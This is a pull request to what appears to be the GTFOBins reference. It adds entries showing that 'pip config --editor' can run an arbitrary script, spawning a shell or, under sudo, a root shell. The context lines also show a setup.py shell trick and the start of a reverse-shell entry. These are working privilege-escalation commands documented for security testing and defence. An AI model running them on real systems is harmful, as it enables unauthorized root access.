### PR TITLE
Include pip config --editor option which allows execution of arbitrar…

### DIFF
--- a/_gtfobins/pip.md
+++ b/_gtfobins/pip.md
@@ -5,6 +5,10 @@ functions:
         TF=$(mktemp -d)
         echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
         pip install $TF
+    - code: |
+         TF=$(mktemp -d)
+         printf '#!/bin/bash\n/bin/bash' > $TF/pwn.sh && chmod +x $TF/pwn.sh
+         pip config --editor $TF/pwn.sh edit
   reverse-shell:
     - description: Run ``socat file:`tty`,raw,echo=0 tcp-listen:12345`` on the attacker box to receive the shell.
       code: |
@@ -70,4 +74,8 @@ functions:
         TF=$(mktemp -d)
         echo "import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')" > $TF/setup.py
         sudo pip install $TF
+    - code: |
+         TF=$(mktemp -d)
+         printf '#!/bin/bash\n/bin/bash' > $TF/pwn.sh && chmod +x $TF/pwn.sh
+         sudo pip config --editor $TF/pwn.sh edit
 ---


### PR DESCRIPTION
- `pip config --editor` allows specifying an editor for pip config changes.
- User can pass any filepath as editor, this allows spawning a shell or escalate to root if user has sudo capability to run pip.